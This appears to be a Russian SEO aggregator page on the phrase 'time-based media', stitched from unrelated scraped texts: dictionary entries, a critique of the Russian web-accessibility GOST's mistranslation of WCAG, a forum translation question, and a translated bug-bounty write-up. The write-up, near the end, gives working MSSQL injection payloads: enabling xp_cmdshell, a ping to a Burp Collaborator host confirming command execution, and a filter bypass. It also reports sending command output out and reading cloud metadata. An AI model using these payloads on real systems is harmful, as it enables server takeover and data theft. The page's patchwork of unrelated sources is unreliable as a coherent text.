27.02.2026
Последние:

Образовательный портал recom.akademiakhv.ru

Образовательный лингвистический портал recom.akademiakhv.ru по изучению различных оборотов и фраз речи.

Обучение 

Time based media что это

admin 0 Comments

time-based

Смотреть что такое «time-based» в других словарях:

time-based — UK US adjective HR ► used to describe payment that is related to the time you spend working, rather than the number of things you do, produce, etc.: »Time based pay may in some cases be replaced by task specific pay. → Compare RESULTS BASED(Cf.… … Financial and business terms

Time-based pricing — refers to a type offer or contract by a provider of a service or supplier of a commodity, in which the price depends on the time when the service is provided or the commodity is delivered. The rational background of time based pricing is expected … Wikipedia

Time-Based Art Festival — The Time Based Art Festival (TBA Festival) is an annual multi media art and performance festival presented by the Portland Institute for Contemporary Art (PICA) and the Pacific Northwest College of Art. [… … Wikipedia

Time-based One-time Password Algorithm — TOTP (Time based One Time Password Algorithm, RFC 6238.) OATH алгоритм создания одноразовых паролей для защищенной аутентификации, являющийся улучшением HOTP (HMAC Based One Time Password Algorithm). Является алгоритмом односторонней… … Википедия

Time-based currency — In economics, a time based currency is an alternative currency where the unit of exchange is the person hour.Time based currencies value everyone’s contributions equally. One hour equals one service credit. In these systems, one person volunteers … Wikipedia

Time-Based Currency — A currency whose value is based on one man hour of labor. A time based currency is an alternative form of currency most often found in communities that place value on volunteerism and social capital. It has no monetary value. Time based… … Investment dictionary

Time Based Management — Management Konzept, das die Geschwindigkeit der Reaktion auf Kundenwünsche (v.a. in der ⇡ Produktentwicklung) als wesentlichen Wettbewerbsvorteil herausstellt … Lexikon der Economics

Time from NPL — Map showing the location of the Anthorn VLF transmitter within Cumbria … Wikipedia

Time Banking — refers to a pattern of reciprocal service exchange which uses units of time as currency and is an example of an alternative economic system. A Time Bank, also known as a Service Exchange, is a community which practices time banking. The unit of… … Wikipedia

Time zone — Timezone and TimeZone redirect here. For other uses, see Time zone (disambiguation). Local time redirects here. For the mathematical concept, see Local time (mathematics). This article is about time zones in general. For a list of time zones by… … Wikipedia

Time — This article is about the measurement. For the magazine, see Time (magazine). For other uses, see Time (disambiguation). The flow of sand in an hourglass can be used to keep track of elapsed time. It also concretely represents the present as… … Wikipedia

Источник

time based

1 time-based

2 time-based

3 time-based

4 time-based

5 time-based

6 time-based

7 контролируемый по времени

8 с временным критерием

9 синхронизируемый

См. также в других словарях:

time-based — UK US adjective HR ► used to describe payment that is related to the time you spend working, rather than the number of things you do, produce, etc.: »Time based pay may in some cases be replaced by task specific pay. → Compare RESULTS BASED(Cf.… … Financial and business terms

Time-based pricing — refers to a type offer or contract by a provider of a service or supplier of a commodity, in which the price depends on the time when the service is provided or the commodity is delivered. The rational background of time based pricing is expected … Wikipedia

Time-Based Art Festival — The Time Based Art Festival (TBA Festival) is an annual multi media art and performance festival presented by the Portland Institute for Contemporary Art (PICA) and the Pacific Northwest College of Art. [… … Wikipedia

Time-based One-time Password Algorithm — TOTP (Time based One Time Password Algorithm, RFC 6238.) OATH алгоритм создания одноразовых паролей для защищенной аутентификации, являющийся улучшением HOTP (HMAC Based One Time Password Algorithm). Является алгоритмом односторонней… … Википедия

Time-based currency — In economics, a time based currency is an alternative currency where the unit of exchange is the person hour.Time based currencies value everyone’s contributions equally. One hour equals one service credit. In these systems, one person volunteers … Wikipedia

Time-Based Currency — A currency whose value is based on one man hour of labor. A time based currency is an alternative form of currency most often found in communities that place value on volunteerism and social capital. It has no monetary value. Time based… … Investment dictionary

Time Based Management — Management Konzept, das die Geschwindigkeit der Reaktion auf Kundenwünsche (v.a. in der ⇡ Produktentwicklung) als wesentlichen Wettbewerbsvorteil herausstellt … Lexikon der Economics

Time from NPL — Map showing the location of the Anthorn VLF transmitter within Cumbria … Wikipedia

Time Banking — refers to a pattern of reciprocal service exchange which uses units of time as currency and is an example of an alternative economic system. A Time Bank, also known as a Service Exchange, is a community which practices time banking. The unit of… … Wikipedia

Time zone — Timezone and TimeZone redirect here. For other uses, see Time zone (disambiguation). Local time redirects here. For the mathematical concept, see Local time (mathematics). This article is about time zones in general. For a list of time zones by… … Wikipedia

Time — This article is about the measurement. For the magazine, see Time (magazine). For other uses, see Time (disambiguation). The flow of sand in an hourglass can be used to keep track of elapsed time. It also concretely represents the present as… … Wikipedia

Источник

Почему российские сайты не будут соответствовать ГОСТу по доступности

Time based media что это

Ссылка на текст действующего ГОСТа ведет на неофициальную копию в PDF, поскольку официальная ссылка с сайта Росстандарта на текст ГОСТа по доступности ведет на не доступную версию в формате JPG, что явно возбраняется этим же ГОСТом. Л – логика, но я сейчас о другом, а именно: об утверждении «при разработке настоящего стандарта за основу был взят актуальный на этот момент документ Web Content Accessibility Guidelines (WCAG) 2.1», содержащемся в разделе «Введение» недоступного ГОСТа по доступности.

Начнем с того, что вообще такое стандарт. Грубо говоря, это 2х2=4, в километре 1000 метров, а питьевое молоко – «продукт нормальной физиологической секреции молочных желез сельскохозяйственных животных без каких-либо добавлений к этому продукту», все остальное – молокосодержащий продукт.

WCAG – это не стандарт, а рекомендация (именно такой официальный статус носит этот документ): «хорошо, если в вашем километре будет не менее 900 и не более 1100 метров, еще лучше, если 950-1050, а в идеале – ровно 1000, но идеал не всегда достижим». Во WCAG это называется «уровень соответствия», их три: А (удовлетворительно), АА (хорошо) и ААА (отлично). Внимание, вопрос: соответствие какому из этих трех уровней рекомендации является соответствием стандарту – ГОСТу? Об этом никто из авторов не подумал.

Теперь почитаем WCAG, прямо с первого абзаца: «следование Руководству сделает контент более доступным для большего числа людей с различными ограничениями». В то же время название ГОСТа: «Приложения для стационарных и мобильных устройств, иные пользовательские интерфейсы». Хотя во WCAG прямо говорится: «Веб-доступность зависит не только от доступности контента, но и поддержки функций доступности со стороны веб-браузеров и других агентов пользователя. Средства создания контента также играют важную роль в обеспечении веб-доступности. См. обзорные материалы по вопросам совместного функционирования этих компонентов веб-разработки и взаимодействия» и даются отсылки к профильным нормативам по обеспечению доступности интерфейсов – UAAG и ATAG.

Но авторы ГОСТ упорствуют в расширении его применения: «в настоящем стандарте требования и рекомендации распространяются не только на доступность веб-контента, но и на доступность любой информации, представленной в электронно-цифровой форме, для взаимодействия с которой используются те же самые или схожие технологии». Еще раз напомню оригинальное название WCAG: «Руководство по обеспечению доступности веб-контента».

Теперь самое веселое – перевод WCAG, который стал ГОСТом, то есть – государственным стандартом, на секундочку. Например, п.3.1.2 ГОСТа дает такое определение термина «активный указатель»: устройство ввода, которое может быть направлено на конкретную точку (точки) на экране, такое как мышь, стилус или палец пользователя.

Оригинал этого определения на английском языке: pointer input – input device that can target a specific coordinate (or set of coordinates) on a screen, such as a mouse, pen, or touch contact.

Отталкиваясь лишь от одного из значений английского слова «device» – «устройство, прибор» – переводчик отнес к ним и человеческий палец, тогда как в оригинале имелось в виду другое значение этого слова – «способ, метод». Таким образом, в исходном тексте (и по контексту WCAG это совершенно очевидно) имелся в виду «метод, способ ввода» информации, а не «устройство ввода». При этом остается неясным, почему в переводе «указатель» стал «активным» и чем обусловлена эта отсебятина.

Упомянутое определение можно было перевести на русский язык, например, следующим образом: ввод указателем – ввод данных или команд путем указания определенных координат на экране, например, с помощью «мыши», стилуса или прикосновения.

Другим примером ошибочного перевода служит перевод термина «alternative for time-based media», названного в п.3.1.4 ГОСТ «альтернативным представлением медиаконтента, ограниченного по времени», и сделанный следующим образом: правильно составленный текстовый комментарий, содержащийся в контенте, синхронизированный с ограниченной по времени видео- или аудиоинформацией и предоставляющий возможность ее интерактивного использования.
Примечание: Программный сценарий (скрипт), используемый для создания синхронизированного медиаконтента, может соответствовать этому определению, если он был скорректирован для точного представления синхронизируемого медиаконтенга после его публикации.

WCAG дает следующее определение этому термину на английском языке: document including correctly sequenced text descriptions of time-based visual and auditory information and providing a means for achieving the outcomes of any time-based interaction
Note: A screenplay used to create the synchronized media content would meet this definition only if it was corrected to accurately represent the final synchronized media after editing.

Это лишь два примера с первой же страницы ГОСТа, а подобного рода грубые ошибки, отсебятина и неточности перевода встречаются буквально в каждом его абзаце.

Тут мне могут возразить, что колхоз ГОСТ – дело добровольное, применять его или нет – решает владелец сайта. Но давайте послушаем мнение органов прокуратуры и судов.

Сыктывкарский городской суд Республики Коми рассмотрев в открытом судебном заседании гражданское дело по исковому заявлению Сыктывкарского транспортного прокурора в интересах неопределенного круга лиц к АО «Комиавиатранс» о приведении интернет-ресурса в соответствие с требованиями законодательства о социальной защите инвалидов, установил: вывод об отсутствие дискриминации по признаку инвалидности при использовании интернет-ресурса может быть сделан лишь при соответствии сайтов ГОСТ Р 52872-2012 «Интернет-ресурсы. Требования доступности для инвалидов по зрению» решил: признать незаконным бездействие и обязать АО «Комиавиатранс» привести сайт… в соответствие с требованиями, установленными ГОСТом Р 52872-2012 «Интернет ресурсы. Требования доступности для инвалидов по зрению».

Думаете, это единичный случай? Нет, были и другие решения, по всей стране: Волгоградская область, Тверская область, Москва, далее – везде. Пока мне попадались только дела, связанные с предыдущей редакцией ГОСТа, но сути это не меняет: надзор и суд считают ГОСТ в области доступности сайтов обязательным к применению.

С учетом этого владельцы сайтов оказываются перед «вилами»: просто забить на доступность обеспечить соответствие своих сайтов единому международному нормативу WCAG, либо безграмотному и многократно перевранному ГОСТу. В первом случае торжествует здравый смысл и обеспечивается реальная доступность сайта для инвалидов, во втором – торжествует маразм и формализм, зато отсутствует повод для претензий со стороны органов прокуратуры и судебной системы.

Какой вариант соответствия выберут владельцы сайтов? Я надеюсь тот, который общепринят, для которого существуют многочисленные средства валидации, который поддерживается всеми современными средствами веб-разработки, агентами пользователя и ассистивными технологиями, а не тот, который несколько безграмотных, но амбициозных авторов при попустительстве Росстандарта решили сделать ГОСТом. Но, как уже было сказано выше, есть нюанс…

Источник

Time based media что это

Войти

Авторизуясь в LiveJournal с помощью стороннего сервиса вы принимаете условия Пользовательского соглашения LiveJournal

Вставляя ссылку на внешний источник в комментарий, стирайте httр://
Или выбирайте «раскрыть для ответов».
Иначе ваш комментарий увидят только модераторы и Вы).

Прошу помощи зала в переводе time-based media коротким и понятным словосочетанием. Контекст – нормативный документ про веб-технологии (WCAG), оригинальное выражение встречается неоднократно в разных ситуациях.

Суть: time-based media – это контент, который в отличие от не time-based, не может быть представлен пользователю и воспринят пользователем весь сразу, одномоментно. Например, видео или аудио, анимированная картинка, флеш-ролик и т.п. – надо сидеть и смотреть (слушать), пока контент воспроизводится. Скажем, есть у нас файл с песней длительностью 3 минуты. Скачать его мы можем условно мгновенно, а вот слушать придется 3 минуты и ни секундой меньше. Та же песня в виде текста ее слов или нот может быть отображена на мониторе вся сразу, поэтому в таком виде контент не time-based. Надеюсь, понятно объяснил.

Пока лучшего перевода, чем динамичный контент, не придумалось… Заранее спасибо за соображения по этому поводу!

«Динамичный» слишком похоже на «динамический», а это означает совсем не то. Путаница будет.

Может быть, «длительный/длящийся» или «продолжительный»?

Источник

Как я расширил Time-Based SQL Injection до RCE

Time based media что это

Тема информационной безопасности и защиты данных крайне актуальна для любого бизнеса, независимо от его размеров и географии. В рамках нашего блога мы решили публиковать заметки зарубежных коллег, основанные на их реальном опыте по теме. Надеемся, что приведенный материал будет вам полезен.

Предисловие

В этой статье я расскажу о своём отчёте, отправленном компании Sony в рамках публичной программы на сайте HackerOne, а также о том, как я преобразовал Blind Time-based SQL Injection в полномасштабное удалённое выполнение команды ОС.

Я вырежу из статьи такие важные подробности, как домены, поддомены, результаты работы команд, мой IP-адрес, IP-адрес сервера и другие.

Этап разведки

Для этапа разведки я использовал sublist3r для поиска поддоменов нужного мне домена.

Time based media что это

Знакомимся ближе с Target

Перейдя на сайт, я увидел, что это что-то типа панели администратора или страницы для логина сотрудников.

Time based media что это

Time based media что это

Конечная точка уязвима к Microsoft SQL Injection.

Сам эксплойт

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36′—

Time based media что это

Хороший признак того, что сервер выполняет вводимые пользователем команды. Затем я проверил возможность time-based SQL injection, чтобы узнать, можно ли помещать запросы в стек.

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36′;WAITFOR DELAY ‘00:00:05’;—

Ответ был отложен примерно на 5 секунд.

Time based media что это

Это подтверждает, что мы можем помещать SQL-запросы в стек и выполнять инъекции любых нужных нам команд.

Расширение SQL-инъекции до RCE

Так как теперь мы знаем, что можем помещать запросы в стек, нужно найти способ исполнять здесь команды ОС. В отличие от MySQL, в MSSQL есть способ исполнения команд. Я воспользовался информацией из статьи Прашанта Кумара.

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36′; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;—

Затем я при помощи ping протестировал возможность слепого RCE

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36′; EXEC xp_cmdshell ‘ping myburpcollablink.burpcollaborator.net’;—

Time based media что это

Отлично! Доступ к Burpsuite Collaborator Client был выполнен. Это подтверждает, что мы можем выполнять RCE.

В отличие от Прашанта Кумара, я не стал сохранять результаты выполнения команд в базу данных и создал неразрушительный способ считывания результатов выполнения команд ОС.

Команда получает результаты выполнения whoami и отправляет их по моей ссылке burpcollab

Готовая полезная нагрузка RCE выглядит так:

Результаты выполнения команды отправляются мне.

Time based media что это

Также мне удалось извлечь информацию о метаданных инстансов AWS EC2, просмотреть серверные файлы и многое другое.

Обходим «исправление»

Я обошёл фильтр, объявив переменную @x со значением xp_cmdshell и запустив команду вида EXEC @x

Источник

Вам также понравится

ступеньки в частный дом на второй этаж

admin 0

Tapering фрс что это

admin 0

порядок обучения по охране труда и проверки знаний требований охраны труда работников школы

admin 0

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *